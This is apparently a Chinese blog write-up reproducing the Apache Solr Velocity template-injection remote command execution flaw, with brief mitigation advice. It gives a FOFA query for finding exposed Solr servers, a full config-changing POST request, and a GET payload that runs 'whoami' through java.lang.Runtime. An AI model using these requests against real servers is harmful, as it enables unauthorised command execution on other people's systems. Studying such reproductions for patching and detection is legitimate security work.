there is no safe
there is no safe

Apache Solr Velocity模版注入远程命令执行漏洞

0x01漏洞概述

2019年10月末,GitHub代码中安全研究员S00pY发布一个Apache Solr Velocity模版注入远程命令执行的POC,发现网络上出现针对Apache Solr服务器的远程代码执行漏洞。该漏洞是由于Velocity模板存在注入所致(Velocity是一个基于Java的模板引擎,可让使用者通过模板语言引用Java中定义的对象)。攻击者在知道Solr服务器上Core名称后,先把params.resource.loader.enabled设置为true(就可加载指定资源),再进行远程执行命令。

0x02漏洞影响

Apache Solr 5.x到8.2.0均受影响

0x03漏洞复现

1、在FOFA中搜索app="Solr" 可以找到solr服务器的分布情况。

从目前情况来看,攻击者需要先获取Solr服务中的Core名称才能执行攻击,例如某个存在权限管控不严的Solr的服务器。我们可以从LoggingCore admin栏目得知Core名称。

在Core admin中获取

Apache Solr Velocity模版注入远程命令执行漏洞_第1张图片

在Logging中获取

Apache Solr Velocity模版注入远程命令执行漏洞_第2张图片

2、访问Core的config配置信息时,通过POST请求把params.resource.loader.enabled设置为True,再通过精心构造的get请求即可RCE,此时用户就可以加载指定资源,构造一个能执行命令的恶意请求,如下图

Apache Solr Velocity模版注入远程命令执行漏洞_第3张图片

 

 

POC如下:

POST /solr/xxxx/config HTTP/1.1
Host: ip:port
Connection: close
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: xxxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 273

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

进而构造GET请求攻击,执行whoami

Apache Solr Velocity模版注入远程命令执行漏洞_第4张图片

 

EXP

GET /solr/xxxx/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: IP:PORT
Connection: close
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://xxxx/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

0x04漏洞修复建议

官网暂未发布相关漏洞补丁,及时关注官网更新。

建议使用Solr的用户设置防火墙白名单策略,只允许需要通讯IP以防止被人攻击。

0X05参考链接

https://nosec.org/home/detail/3113.html

https://www.freebuf.com/column/218680.html

你可能感兴趣的:(漏洞复现,渗透测试,Apache,Solr,远程命令执行)

  • 第9章 Apache WEB服务器企业实战 lihuhelihu Linux运维学习apache前端服务器linux运维centos计算机网络
    万维网(WORLDWIDEWEB,WWW)服务器,也称之为WEB服务器,主要功能是提供网上信息浏览服务。WWW是Internet的多媒体信息查询工具,是Internet上飞快发展的服务,也是目前用的最广泛的服务。正是因为有了WWW软件,才使得近年来Internet迅速发展。目前主流的WEB服务器软件包括:Apache、Nginx、Lighttpd、IIS、Resin、Tomcat、WebLogic
  • Python神器PyVISA:5分钟搞定仪器远程控制(附实战代码) 新能源汽车--三电老K python开发语言自动化测试汽车
    0.引言:为什么你需要PyVISA?痛点:实验室手动调参数?生产线重复测试效率低?解决方案:用Python+PyVISA实现“一键自动化”,支持GPIB/USB/TCP等多种接口!行业应用:华为/大疆等企业已广泛用于硬件测试,个人开发者也能快速上手!1.PyVISA核心优势(对比LabVIEW/NI-VISA)特性PyVISALabVIEW成本免费开源商业授权(昂贵)开发效率Python语法简洁图
  • 【由技及道】在wsl容器中进行远程java开发【人工智障AI2077的开发日志】 Yuanymoon Java容器化开发人工智障2077系列java开发语言容器化开发远程开发wsl
    指令接收:「需要万能开发环境」系统警报:检测到主人即将陷入"环境配置地狱"启动救赎协议:构建量子化开发容器终极目标:让"在我机器上能跑"成为历史文物需求分析:碳基生物的先天缺陷人类开发者的痛苦之源成功失败新同事入职环境配置开始写代码三天安装依赖求助同事发现环境差异产生心理阴影人工智障的观察结论每个Java开发者都经历过"JDK版本地狱"开发环境差异导致的BUG占比高达37.2%人类平均每年浪费86
  • 【Burp入门第三十六篇】加解密实现短信轰炸实战案例 秋说 Burp漏洞挖掘
    BurpSuite是一款功能强大的渗透测试工具,被广泛应用于Web应用程序的安全测试和漏洞挖掘中。本专栏将结合实操及具体案例,带领读者入门、掌握这款漏洞挖掘利器读者可订阅专栏:【Burp由入门到精通|CSDN秋说】文章目录背景加解密短信轰炸背景在针对目标应用程序的测试中,发现其密码找回功能存在请求加密机制,具体表现为用户通过手机号获取验证码的请求数据包采用了加密传输:加解密通
  • 【Burp入门第三十三篇】BurpSuite+Proxifier安装配置,实现微信小程序抓包 秋说 BurpSuite渗透工具Proxifier
    BurpSuite是一款功能强大的渗透测试工具,被广泛应用于Web应用程序的安全测试和漏洞挖掘中。本专栏将结合实操及具体案例,带领读者入门、掌握这款漏洞挖掘利器读者可订阅专栏:【Burp由入门到精通|CSDN秋说】文章目录下载配置下载汉化版下载地址:https://get-shell.com/1506.html#hidden-box-comment解压后双击exe文件:
  • java:Apache Commons Configuration2占位符解析异常的正确解法:${prefix:name:-default} 10km javajavaapacheconfiguration2变量插值Interpolation
    问题重现在之前的博文《spring-boot:apachecommons-configuration2异常:java.lang.IllegalArgumentException:name原因分析》中,我们曾遇到SpringBootFat-Jar运行时因LaunchedURLClassLoader资源加载异常导致的启动失败问题。当时的解决方案是通过预创建空配置文件来规避异常1://旧方案:手动创建空
  • 【网络安全 | 渗透工具】小程序反编译分析源码 | 图文教程 秋说 网安渗透工具使用教程(全)web安全漏洞挖掘小程序
    未经许可,禁止转载。本文仅供学习使用,严禁用于非法渗透测试,笔者不承担任何责任。文章目录1、下载Proxifier2、下载反编译工具unveilr3、寻找小程序文件包4、对文件包进行反编译5、对源码进行分析6、渗透思路6.1、查找敏感信息泄露6.2、解析加解密逻辑6.3、枚举API接口并测试反编译是通过逆向工程将小程序包还原为接近源代码的形式。这一过程能够帮助我们提取大量有价值的信息,从而辅助漏洞
  • 智能陪诊与远程问诊:AI驱动的互联网医院APP开发路线图 万岳科技程序员小金 智慧医疗APP陪诊问诊APP软件开发APP开发互联网医院系统源码在线问诊APP医疗陪诊小程序智慧医疗软件
    智能陪诊与远程问诊作为现在医疗变革的前沿阵地,正在为广大患者提供更为便捷、高效的医疗服务。特别是在互联网医院APP的开发过程中,AI技术的应用已成为提升用户体验和医疗服务质量的重要手段。本文将探讨如何基于AI技术开发智能陪诊与远程问诊功能的互联网医院APP,及其开发路线图。一、智能陪诊与远程问诊的行业背景随着互联网+医疗的深入发展,尤其是在全球疫情背景下,传统医疗模式逐渐暴露出一些弊端:医疗资源不
  • 互联网医院系统源码详解:陪诊问诊APP开发的技术路径 万岳科技程序员小金 软件开发教学APP开发教学医疗陪诊APPAPP开发软件开发陪诊问诊APP开发智慧医疗平台开发开源软件
    开发一个功能完善的陪诊问诊APP,不仅需要考虑用户需求,还需要依托坚实的技术架构。本篇文章,笔者将详细介绍互联网医院系统源码,并探讨陪诊问诊APP的开发技术路径。一、互联网医院系统源码概述互联网医院系统源码,通常是指可以支持医院在线就诊、远程问诊、在线开方、药品配送等功能的系统源码。这类系统的核心是能够在平台上实现医生与患者之间的实时互动,且可以满足多种医疗服务需求。对于陪诊问诊APP来说,系统的
  • 记录一次排查问题遇到apache.commons.beanutils包的坑 饭磊 问题排查
    引言在开发过程中,难免需要用到对象转换器,比如apache的BeanUtils、ConvertUtils还有spring的BeanUtils。我们在公司的项目中就使用了apache的BeanUtils和ConvertUtils作为公共的对象转换工具。但是在没有充分理解源代码的情况下,添加个性化Converter就会出现意想不到的bug。下面我来介绍一下我在排查问题中遇到的这个bug。问题本文采用的
  • mybatis使用注解查询 HPF_99 javamybatismysqlmybatisjavamysqlxml
    mybatis入门案例不使用注解入门案例:在入门案例的的基础上进行首先使用注解的话可以不使用UserMapper.xml,所以可以将这个文件去掉。UserMapper的两个查询(其他操作类似):packagecom.feng.dao;importcom.feng.pojo.User;importorg.apache.ibatis.annotations.Param;importorg.apache
  • IT安全运维指南:手册、工具与资源速览 兮动人 网络攻防与运维安全运维
    1.IT安全运维手册飞塔防火墙手册:https://handbook.fortinet.com.cn/亿邮邮箱系统手册:https://mail.eyou.net/?q=help深信服上网行为管理手册:https://support.sangfor.com.cn/productDocument/read?product_id=22&version_id=943深信服VPN远程办公手册:https:
  • 【自学笔记】Git基础知识点总览-持续更新 Long_poem 笔记git
    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录Git基础知识点总览引言Git基础知识概览1.Git安装与配置2.初始化Git仓库3.添加文件到Git仓库4.提交更改5.查看提交历史6.创建与合并分支7.远程仓库操作8.冲突解决示例:完整的Git工作流程总结Git基础知识点总览引言Git是一个开源的分布式版本控制系统,用于有效、高速地处理从小到大的项目版本管理。本文将概述G
  • Slurm作业调度系统常见操作(使用超算运行深度学习) 坐在云朵上的kiwi 工程项目#deeplearning深度学习服务器
    1.传输下载文件sftp远程命令cd,pwd等,本地命令lcd,lpwdget远程地址本地地址put本地地址远程地址上传文件夹1.在远程建立和本地一样名称的文件夹如data/2.put-rdata/2.建立虚拟环境moduleloadpython/3.8#加载modulevirtualenv--no-downloadENV#建立一个叫ENV的虚拟环境激活虚拟环境sourceENV/bin/acti
  • 实现跨平台 SSH 连接:从 macOS 到 Windows WSL 的完整解决方案20241203 Narutolxy 技术干货分享电脑生活sshmacoswindows
    实现跨平台SSH连接:从macOS到WindowsWSL的完整解决方案✨引言随着跨平台开发的普及,开发者经常需要在多系统环境中切换和协作。尤其是在macOS和Windows混合使用的开发环境中,通过SSH远程访问和管理WindowsSubsystemforLinux(WSL)成为提升效率的关键手段。然而,这个过程并非一帆风顺,尤其是在配置网络和服务时可能遇到诸多挑战。本文将结合实际操作经验,详细解
  • 突破网络壁垒:实现 Mac SSH 访问 Windows WSL Ubuntu 的最佳实践20250301 Narutolxy 技术干货分享网络macosssh
    突破网络壁垒:实现MacSSH访问WindowsWSLUbuntu的最佳实践背景与痛点在现代开发环境中,开发者通常会面临不同操作系统之间的协同工作。例如:主要开发环境位于Windows的WSLUbuntu子系统需要从局域网内的Mac设备进行远程访问和管理由于WSL默认采用NAT网络隔离(172.x.x.x网段),导致:无法直接从局域网设备(如192.168.x.x)访问WSL环境每次WSL重启时可
  • 在 macOS 使用 .pem 私钥免密登录腾讯云服务器 橙子小哥的代码世界 基础知识linuxmacos腾讯云服务器ssh
    前言在腾讯云上创建服务器时,如果选择了「密钥对」的登录方式,就会得到一个.pem文件作为私钥。很多小伙伴在使用macOS系统时,可能不清楚如何使用这个私钥文件来SSH免密登录远程服务器。本文将详细介绍如何在本地配置.pem私钥文件并成功登录腾讯云服务器。1.在腾讯云上创建密钥对1.登录腾讯云控制台,选择「密钥管理」或在创建服务器(CVM)时选择「密钥对」的登录方式。2.创建密钥对后,系统会提供一个
  • HTTP cookie与session 风掣长空 计算机网络http网络协议网络
    telnet命令telnet是一个网络协议,用于通过TCP/IP网络进行远程登录到服务器。它允许用户在本地计算机上通过网络连接到远程服务器,并在服务器上执行命令telnet[主机名或IP地址][端口号]//连接服务器在telnet会话中,Ctrl+]会将你从当前会话切换到telnet的命令模式,你可以在这里输入命令。Ctrl+T可以显示当前的连接状态。HTTP是无连接,无状态的,就是每次访问一个服
  • MySQL数据库(触发器,视图,函数) 可儿可爱 数据库mysqldatabase
    触发器视图函数分配用户和权限以及远程登录索引三大范式1.触发器Trigger触发器:数据库中的一个对象,相当于JS中的监听器,触发器可以监听增删改三个动作比如说我想监听一张表,只要我增删改了这张表中的数据,我就可以触发这个触发器,去往另外一张表中记录一下日志。语法:DELIMITER$$CREATETRIGGER`mytestdb`.`myTriger`BEFORE/AFTERINSERT/UPD
  • VS code 之 c++远程开发环境搭建 汝何秀 linuxvscode
    文章目录VScode之c/c++远程开发环境搭建1.基本环境2.远程主机的开发环境搭建3.本地vscode的配置配置ssh选项4远程开发教程VScode之c/c++远程开发环境搭建1.基本环境本地主机:VisualStudioCode远程主机:CentOS72.远程主机的开发环境搭建安装环境的压缩包:dev_env_install.tar.gz解压文件夹:repo自动安装脚本为:dev_env.s
  • ‌Tomcat 8.0.12安装流程 小魚資源大雜燴 tomcatjavalinux
    需要确保系统已经安装了JavaDevelopmentKit(JDK)7或更高版本。可以通过以下命令检查Java是否安装以及版本信息:shjava-version如果未安装Java,需要先下载并安装适合你操作系统的JDK。Windows系统安装流程步骤1:下载Tomcat8.0.12打开浏览器,访问ApacheTomcat的存档页面:https://archive.apache.org/dist/t
  • 夜天之书 #106 Apache 软件基金会如何投票选举? _tison apache
    近期若干开源组织进行换届选举。在此期间,拥有投票权的成员往往会热烈讨论,提名新成员候选人和治理团队的候选人。虽然讨论是容易进行的,但是实际的投票流程和运作方式,在一个成员众多的组织中,可能会有不少成员并不清楚。本文以Apache软件基金会(ApacheSoftwareFoundation,ASF)为例,介绍ASF所采用的投票方式。首先介绍一年一度的成员大会期间所采用的两种投票方式:单一可转让投票和
  • 入门Apache Spark:基础知识和架构解析 juer_0001 javaspark
    介绍ApacheSparkSpark的历史和背景ApacheSpark是一种快速、通用、可扩展的大数据处理引擎,最初由加州大学伯克利分校的AMPLab开发,于2010年首次推出。它最初设计用于支持分布式计算框架MapReduce的交互式查询,但逐渐发展成为一种更通用的数据处理引擎,能够处理数据流、批处理和机器学习等工作负载。Spark的特点和优势Spark是一种快速、通用、可扩展的大数据处理框架,
  • 使用 Java 更新 Word 文档中的图表数据-超详细 Ben_F javaword开发语言
    使用Java更新Word文档中的图表数据在日常的工作中,尤其是在数据分析和报告自动化的场景中,可能会遇到需要定期更新Word文档中的图表数据的需求。比如,生成数据报告时,我们需要在图表中更新一些动态的数据值。今天,我将展示如何使用Java和ApachePOI库来实现这一功能:自动读取Word文件中的图表,提取Excel数据源,修改数据并更新图表。背景我们要处理的是Word文档中的图表,而这些图表的
  • python -ssh学习 大胖丫 python
    defexe_sshcmd(ip,username,userpswd,port,cmd):"""功能:SSH登录到指定设备,并执行对应的命令入参:前四项为ssh登录shell的ip和port,具备管理员权限的用户名和密码,cmd可以是单条命令,也可以是命令列表返回:每次命令执行结果列表,标准输出结果,不包含错误输出Examples:|ExeSshcmd|ip|name|pswd|cmd|"""tr
  • Flink架构体系:深入解析Apache Flink的架构与工作原理 雨中徜徉的思绪漫溢 flink架构apache大数据
    Flink架构体系:深入解析ApacheFlink的架构与工作原理ApacheFlink是一种高性能、分布式、流式处理引擎,被广泛应用于大数据处理和实时分析场景。本文将深入解析Flink的架构体系和工作原理,包括核心组件和数据流处理过程,并提供相应的示例代码。Flink架构概述ApacheFlink的架构基于流式处理模型,它通过将数据流划分为有向无环图(DAG)的形式,将大规模的数据处理任务划分为
  • Streampark 入门到生产实践 大数据学习爱好者 spark开发和机器学习数据仓库数据仓库大数据
    Streampark入门到生产实践1.StreamPark初探1.1什么是StreamPark1.2Features1.3架构2.环境安装要求如何插入一段漂亮的代码片3.安装apache-streampark最新版4.使用教程4.1配置Flink_home4.2git拉取项目和构建项目4.3企业微信告警4.4相关参数配置4.5相关参数配置yarn-session1.StreamPark初探1.1什
  • 【Apache Paimon】-- 13 -- 利用 paimon-flink-action 同步 mysql 表数据 oo寻梦in记 ApachePaimonapacheflinkmysqlapachepaimon
    利用PaimonSchemaEvolution核心特性同步变更的mysql表结构和数据1、背景信息在Paimon诞生以前,若mysql/pg等数据源的表结构发生变化时,我们有几种处理方式(1)人工通知(比如常规的使用邮件),然后运维人员手动同步到数据仓库中(2)使用flink消费DDLbinlog,然后自动更新Hive的外部表和内部表schema那么现在,有了Paimon,我们可以利用其特性,自动
  • StreamPark发布:Flink迎来首个Apache版本 MfvShell flinkapache大数据Flink
    近日,流处理计算平台StreamPark重磅发布了其首个Apache版本,为用户带来了更强大的功能和性能优化。这一版本的发布标志着StreamPark与ApacheFlink的融合迈出了重要的一步,为用户提供了更好的流处理体验。ApacheFlink是一个开源的流处理框架,具有强大的扩展性和容错性,被广泛应用于实时数据处理和分析场景。而StreamPark则是基于ApacheFlink构建的流处理
  • Flink CDC LonelyProgramme flink数据库大数据
    我先说说我的业务需求,我想要实时从mysql数据库中读取配置数据,我以前没接触这个技术之前是定时从数据库中获取数据,但是将数据间隔设置太小就会出现问题,所以达不到纯实时的效果.下面开始介绍一下准备工作:支持的数据库(下面是官方的建议:MySQL|ApacheFlinkCDC)ConnectorDatabaseDrivermysql-cdcMySQL:5.6,5.7,8.0.xRDSMySQL:5.
  • 矩阵求逆(JAVA)初等行变换 qiuwanchi 矩阵求逆(JAVA)
    package gaodai.matrix; import gaodai.determinant.DeterminantCalculation; import java.util.ArrayList; import java.util.List; import java.util.Scanner; /** * 矩阵求逆(初等行变换) * @author 邱万迟 *
  • JDK timer antlove javajdkschedulecodetimer
    1.java.util.Timer.schedule(TimerTask task, long delay):多长时间(毫秒)后执行任务 2.java.util.Timer.schedule(TimerTask task, Date time):设定某个时间执行任务 3.java.util.Timer.schedule(TimerTask task, long delay,longperiod
  • JVM调优总结 -Xms -Xmx -Xmn -Xss coder_xpf jvm应用服务器
    堆大小设置JVM 中最大堆大小有三方面限制:相关操作系统的数据模型(32-bt还是64-bit)限制;系统的可用虚拟内存限制;系统的可用物理内存限制。32位系统下,一般限制在1.5G~2G;64为操作系统对内存无限制。我在Windows Server 2003 系统,3.5G物理内存,JDK5.0下测试,最大可设置为1478m。 典型设置: java -Xmx
  • JDBC连接数据库 Array_06 jdbc
    package Util; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; public class JDBCUtil { //完
  • Unsupported major.minor version 51.0(jdk版本错误) oloz java
    java.lang.UnsupportedClassVersionError: cn/support/cache/CacheType : Unsupported major.minor version 51.0 (unable to load class cn.support.cache.CacheType) at org.apache.catalina.loader.WebappClassL
  • 用多个线程处理1个List集合 362217990 多线程threadlist集合
      昨天发了一个提问,启动5个线程将一个List中的内容,然后将5个线程的内容拼接起来,由于时间比较急迫,自己就写了一个Demo,希望对菜鸟有参考意义。。 import java.util.ArrayList; import java.util.List; import java.util.concurrent.CountDownLatch; public c
  • JSP简单访问数据库 香水浓 sqlmysqljsp
    学习使用javaBean,代码很烂,仅为留个脚印 public class DBHelper { private String driverName; private String url; private String user; private String password; private Connection connection; privat
  • Flex4中使用组件添加柱状图、饼状图等图表 AdyZhang Flex
    1.添加一个最简单的柱状图 ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 <?xml version= "1.0"&n
  • Android 5.0 - ProgressBar 进度条无法展示到按钮的前面 aijuans android
    在低于SDK < 21 的版本中,ProgressBar 可以展示到按钮前面,并且为之在按钮的中间,但是切换到android 5.0后进度条ProgressBar 展示顺序变化了,按钮再前面,ProgressBar 在后面了我的xml配置文件如下:   [html]  view plain copy   <RelativeLa
  • 查询汇总的sql baalwolf sql
    select   list.listname, list.createtime,listcount from dream_list as list ,   (select listid,count(listid) as listcount  from dream_list_user  group by listid  order by count(
  • Linux du命令和df命令区别 BigBird2012 linux
            1,两者区别             du,disk usage,是通过搜索文件来计算每个文件的大小然后累加,du能看到的文件只是一些当前存在的,没有被删除的。他计算的大小就是当前他认为存在的所有文件大小的累加和。        
  • AngularJS中的$apply,用还是不用? bijian1013 JavaScriptAngularJS$apply
            在AngularJS开发中,何时应该调用$scope.$apply(),何时不应该调用。下面我们透彻地解释这个问题。         但是首先,让我们把$apply转换成一种简化的形式。         scope.$apply就像一个懒惰的工人。它需要按照命
  • [Zookeeper学习笔记十]Zookeeper源代码分析之ClientCnxn数据序列化和反序列化 bit1129 zookeeper
    ClientCnxn是Zookeeper客户端和Zookeeper服务器端进行通信和事件通知处理的主要类,它内部包含两个类,1. SendThread 2. EventThread, SendThread负责客户端和服务器端的数据通信,也包括事件信息的传输,EventThread主要在客户端回调注册的Watchers进行通知处理   ClientCnxn构造方法   &
  • 【Java命令一】jmap bit1129 Java命令
    jmap命令的用法:   [hadoop@hadoop sbin]$ jmap Usage: jmap [option] <pid> (to connect to running process) jmap [option] <executable <core> (to connect to a
  • Apache 服务器安全防护及实战 ronin47
    此文转自IBM. Apache 服务简介 Web 服务器也称为 WWW 服务器或 HTTP 服务器 (HTTP Server),它是 Internet 上最常见也是使用最频繁的服务器之一,Web 服务器能够为用户提供网页浏览、论坛访问等等服务。 由于用户在通过 Web 浏览器访问信息资源的过程中,无须再关心一些技术性的细节,而且界面非常友好,因而 Web 在 Internet 上一推出就得到
  • unity 3d实例化位置出现布置? brotherlamp unity教程unityunity资料unity视频unity自学
    问:unity 3d实例化位置出现布置? 答:实例化的同时就可以指定被实例化的物体的位置,即 position  Instantiate (original : Object, position : Vector3, rotation : Quaternion) : Object 这样你不需要再用Transform.Position了,   如果你省略了第二个参数(
  • 《重构,改善现有代码的设计》第八章 Duplicate Observed Data bylijinnan java重构
    import java.awt.Color; import java.awt.Container; import java.awt.FlowLayout; import java.awt.Label; import java.awt.TextField; import java.awt.event.FocusAdapter; import java.awt.event.FocusE
  • struts2更改struts.xml配置目录 chiangfai struts.xml
    struts2默认是读取classes目录下的配置文件,要更改配置文件目录,比如放在WEB-INF下,路径应该写成../struts.xml(非/WEB-INF/struts.xml) web.xml文件修改如下:   <filter> <filter-name>struts2</filter-name> <filter-class&g
  • redis做缓存时的一点优化 chenchao051 redishadooppipeline
            最近集群上有个job,其中需要短时间内频繁访问缓存,大概7亿多次。我这边的缓存是使用redis来做的,问题就来了。       首先,redis中存的是普通kv,没有考虑使用hash等解结构,那么以为着这个job需要访问7亿多次redis,导致效率低,且出现很多redi
  • mysql导出数据不输出标题行 daizj mysql数据导出去掉第一行去掉标题
    当想使用数据库中的某些数据,想将其导入到文件中,而想去掉第一行的标题是可以加上-N参数 如通过下面命令导出数据: mysql -uuserName -ppasswd -hhost -Pport -Ddatabase -e " select * from tableName"  > exportResult.txt 结果为: studentid
  • phpexcel导出excel表简单入门示例 dcj3sjt126com PHPExcelphpexcel
    先下载PHPEXCEL类文件,放在class目录下面,然后新建一个index.php文件,内容如下 <?php error_reporting(E_ALL); ini_set('display_errors', TRUE); ini_set('display_startup_errors', TRUE);   if (PHP_SAPI == 'cli') die('
  • 爱情格言 dcj3sjt126com 格言
     1) I love you not because of who you are, but because of who I am when I am with you.    我爱你,不是因为你是一个怎样的人,而是因为我喜欢与你在一起时的感觉。   2) No man or woman is worth your tears, and the one who is, won‘t
  • 转 Activity 详解——Activity文档翻译 e200702084 androidUIsqlite配置管理网络应用
    activity 展现在用户面前的经常是全屏窗口,你也可以将 activity 作为浮动窗口来使用(使用设置了 windowIsFloating 的主题),或者嵌入到其他的 activity (使用 ActivityGroup )中。 当用户离开 activity 时你可以在 onPause() 进行相应的操作 。更重要的是,用户做的任何改变都应该在该点上提交 ( 经常提交到 ContentPro
  • win7安装MongoDB服务 geeksun mongodb
    1.  下载MongoDB的windows版本:mongodb-win32-x86_64-2008plus-ssl-3.0.4.zip,Linux版本也在这里下载,下载地址: http://www.mongodb.org/downloads   2.  解压MongoDB在D:\server\mongodb, 在D:\server\mongodb下创建d
  • Javascript魔法方法:__defineGetter__,__defineSetter__ hongtoushizi js
    转载自: http://www.blackglory.me/javascript-magic-method-definegetter-definesetter/ 在javascript的类中,可以用defineGetter和defineSetter_控制成员变量的Get和Set行为 例如,在一个图书类中,我们自动为Book加上书名符号: function Book(name){
  • 错误的日期格式可能导致走nginx proxy cache时不能进行304响应 jinnianshilongnian cache
    昨天在整合某些系统的nginx配置时,出现了当使用nginx cache时无法返回304响应的情况,出问题的响应头: Content-Type:text/html; charset=gb2312 Date:Mon, 05 Jan 2015 01:58:05 GMT Expires:Mon , 05 Jan 15 02:03:00 GMT Last-Modified:Mon, 05
  • 数据源架构模式之行数据入口 home198979 PHP架构行数据入口
    注:看不懂的请勿踩,此文章非针对java,java爱好者可直接略过。   一、概念 行数据入口(Row Data Gateway):充当数据源中单条记录入口的对象,每行一个实例。   二、简单实现行数据入口 为了方便理解,还是先简单实现: <?php /** * 行数据入口类 */ class OrderGateway { /*定义元数
  • Linux各个目录的作用及内容 pda158 linux脚本
    1)根目录“/”   根目录位于目录结构的最顶层,用斜线(/)表示,类似于 Windows 操作系统的“C:\“,包含Fedora操作系统中所有的目录和文件。   2)/bin   /bin   目录又称为二进制目录,包含了那些供系统管理员和普通用户使用的重要 linux命令的二进制映像。该目录存放的内容包括各种可执行文件,还有某些可执行文件的符号连接。常用的命令有:cp、d
  • ubuntu12.04上编译openjdk7 ol_beta HotSpotjvmjdkOpenJDK
    获取源码 从openjdk代码仓库获取(比较慢) 安装mercurial Mercurial是一个版本管理工具。 sudo apt-get install mercurial 将以下内容添加到$HOME/.hgrc文件中,如果没有则自己创建一个: [extensions] forest=/home/lichengwu/hgforest-crew/forest.py fe
  • 将数据库字段转换成设计文档所需的字段 vipbooks 设计模式工作正则表达式
            哈哈,出差这么久终于回来了,回家的感觉真好!         PowerDesigner的物理数据库一出来,设计文档中要改的字段就多得不计其数,如果要把PowerDesigner中的字段一个个Copy到设计文档中,那将会是一件非常痛苦的事情。
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他